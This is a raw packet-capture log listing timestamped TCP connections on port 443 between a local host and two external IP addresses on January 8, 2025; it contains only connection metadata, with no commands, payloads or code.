Jan 8, 2025 13:55:23.258608103 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.258658886 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.258663893 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.258851051 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.258868933 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.258899927 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.258904934 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.258920908 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.258953094 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.259145975 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.259159088 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.259212971 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.259217978 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.259229898 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.259279966 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.263221025 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.305676937 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.305700064 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.305744886 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.305756092 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.305783987 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.305804014 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.343914986 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.343935013 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.344006062 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.344013929 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.344084978 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.344199896 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.344214916 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.344270945 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.344275951 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.344286919 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.344332933 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.344883919 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.344898939 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.344944000 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.344949961 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.345077038 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.345096111 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.345108986 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.345113993 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.345128059 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.345170975 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.345341921 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.345356941 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.345405102 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.345410109 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.345504045 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.345714092 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.345729113 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.345773935 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.345778942 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.345827103 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.345854044 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.345868111 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.345911980 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.345916986 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.345977068 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.392335892 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.392354965 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.392401934 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.392411947 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.392446041 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.392453909 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.431009054 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.431030035 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.431066990 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.431077957 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.431091070 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.431106091 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.431112051 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.431128025 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.431134939 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.431144953 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.431166887 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.431178093 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.431551933 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.431566954 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.431621075 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.431626081 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.431644917 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.431690931 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.431857109 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.431874990 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.431962967 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.431968927 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.432049036 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.432065010 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.432068110 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.432077885 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.432092905 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.432127953 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.432401896 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.432418108 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.432454109 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.432459116 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.432480097 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.432493925 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.432558060 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.432575941 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.432609081 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.432614088 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.432638884 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.432651043 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.479331970 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.479351997 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.479434967 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.479464054 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.479480028 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.479631901 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.517636061 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.517663002 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.517724037 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.517736912 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.517767906 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.517790079 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.517811060 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.518307924 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.518326044 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.518378019 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.518385887 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.518616915 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.518635035 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.518666983 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.518677950 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.518697023 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.518817902 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.518831968 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.518862963 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.518870115 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.518888950 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.519212008 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.519229889 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.519253016 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.519258976 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.519282103 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.519426107 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.519438982 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.519475937 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.519483089 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.519503117 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.537010908 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.566306114 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.566327095 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.566411972 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.566438913 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.566571951 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.604470015 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.604505062 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.604573011 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.604579926 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.604615927 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.604636908 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.604670048 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.605067968 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.605086088 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.605124950 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.605134010 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.605146885 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.605343103 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.605365992 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.605390072 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.605396986 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.605423927 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.605580091 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.605596066 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.605648994 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.605655909 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.605670929 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.605933905 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.605954885 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.605982065 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.605988026 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.606014013 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.606131077 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.606143951 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.606178999 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.606184959 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.606213093 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.607789993 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.653181076 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.653203964 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.653294086 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.653318882 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.653336048 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.691348076 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.691373110 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.691418886 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.691454887 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.691481113 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.691641092 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.691653967 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.691689968 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.691698074 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.691709042 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.691883087 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.691901922 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.691925049 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.691931963 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.691956043 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.692249060 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.692261934 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.692298889 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.692307949 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.692333937 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.692537069 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.692555904 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.692590952 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.692598104 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.692617893 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.692656040 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.692668915 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.692703962 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.692715883 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.692734003 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.692774057 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.693146944 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.693162918 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.693214893 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.693221092 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.693250895 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.733963966 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.742373943 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.742399931 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.742456913 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.742489100 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.742506981 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.742533922 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.779126883 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.779155970 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.779231071 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.779244900 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.779253960 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.779261112 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.779284954 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.779289007 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.779318094 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.779330015 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.779350042 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.779373884 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.779392958 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.779421091 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.779431105 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.779443026 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.779464960 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.779478073 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.779500008 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.779531002 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.779536009 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.779548883 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.779556036 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.779570103 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.779577971 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.779592037 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.779599905 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.779633045 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.779731035 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.779752016 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.779791117 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.779794931 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.779810905 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.779825926 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.780081987 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.780109882 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.780139923 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.780143976 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.780174971 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.780189991 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.833328962 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.833355904 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.833452940 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.833496094 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.833565950 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.864917040 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.864942074 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.865000963 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.865030050 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.865047932 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.865062952 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.865369081 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.865384102 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.865417957 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.865423918 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.865454912 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.865803003 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.865817070 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.865859032 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.865865946 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.865923882 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.865941048 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.865967035 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.865972996 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.865991116 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.866035938 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.866161108 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.866173983 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.866214991 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.866220951 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.866319895 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.866573095 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.866586924 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.866631031 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.866637945 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.866669893 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.866842031 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.866856098 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.866892099 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.866897106 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.866920948 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.866935015 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.920068026 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.920094967 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.920155048 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.920177937 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.920192957 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.920262098 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.951961994 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.952006102 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.952050924 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.952055931 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.952080011 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.952094078 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.952121973 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.952151060 CET	443	49867	185.166.143.48	192.168.2.4
Jan 8, 2025 13:55:23.952347994 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:23.952425003 CET	49867	443	192.168.2.4	185.166.143.48
Jan 8, 2025 13:55:30.534775972 CET	49945	443	192.168.2.4	142.250.185.225
Jan 8, 2025 13:55:30.534848928 CET	443	49945	142.250.185.225	192.168.2.4
Jan 8, 2025 13:55:30.534955025 CET	49945	443	192.168.2.4	142.250.185.225
Jan 8, 2025 13:55:30.539449930 CET	49945	443	192.168.2.4	142.250.185.225
Jan 8, 2025 13:55:30.539477110 CET	443	49945	142.250.185.225	192.168.2.4
Jan 8, 2025 13:55:31.278038979 CET	443	49945	142.250.185.225	192.168.2.4
Jan 8, 2025 13:55:31.278177023 CET	49945	443	192.168.2.4	142.250.185.225
Jan 8, 2025 13:55:31.278806925 CET	443	49945	142.250.185.225	192.168.2.4
Jan 8, 2025 13:55:31.279485941 CET	49945	443	192.168.2.4	142.250.185.225
Jan 8, 2025 13:55:31.493216991 CET	49945	443	192.168.2.4	142.250.185.225
Jan 8, 2025 13:55:31.493241072 CET	443	49945	142.250.185.225	192.168.2.4
Jan 8, 2025 13:55:31.493532896 CET	443	49945	142.250.185.225	192.168.2.4
Jan 8, 2025 13:55:31.528537035 CET	49945	443	192.168.2.4	142.250.185.225
Jan 8, 2025 13:55:31.571332932 CET	443	49945	142.250.185.225	192.168.2.4
